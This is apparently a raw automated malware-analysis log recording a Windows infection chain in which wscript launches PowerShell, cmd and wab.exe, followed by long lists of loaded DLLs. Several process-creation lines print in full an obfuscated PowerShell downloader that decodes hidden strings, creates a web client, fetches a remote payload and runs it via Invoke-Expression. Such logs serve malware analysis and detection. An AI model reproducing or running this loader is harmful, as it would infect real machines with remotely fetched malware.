Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
